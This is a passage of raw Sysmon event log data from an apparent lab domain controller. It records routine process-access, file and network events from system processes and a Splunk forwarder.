12:02:12.323{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.323{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.291{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.291{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.291{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+3a1a|c:\windows\system32\SYSNTFY.dll+1e8d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.291{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.276{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\sessenv.dll+3de88|c:\windows\system32\sessenv.dll+f881|c:\windows\system32\sessenv.dll+677c|c:\windows\system32\SYSNTFY.dll+1e8d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+527f8|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.260{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.260{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.260{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.260{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.198{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40C0918907B992E2B931BC03C6329778,SHA256=D7A2819F88C74A009909F63620E9E9F5F5DF7A9CBDF7735106563B7B0F6E7351,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000004517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.980{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64956- 354300x80000000000000004516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.980{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57018- 354300x80000000000000004515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.156{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53568-false52.250.46.236-443https 354300x80000000000000004514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.998{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63556- 23542300x80000000000000004513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.167{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=26524C8AFA908978934B81AA735535EE,SHA256=5B6DE59B03777572AD1A9F4C862040AB29A9BB358EA0251B4C0C9780BB5914CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.151{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-9F00-00000000AE01}3448C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000004511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.151{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=187298FBDC73F950802B3821D39DFD05,SHA256=34190C991BFF43635D699161ADD7B30EC82639009C863EC8408157B9E4DB227A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.151{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.151{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.151{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.151{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.151{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64C4-6064-9F00-00000000AE01}3448C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000004505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.151{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-64C4-6064-9F00-00000000AE01}3448C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+108c6|c:\windows\system32\UBPM.dll+d439|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65bf5|C:\Windows\SYSTEM32\ntdll.dll+658fd|C:\Windows\SYSTEM32\ntdll.dll+65760|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:12.136{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dl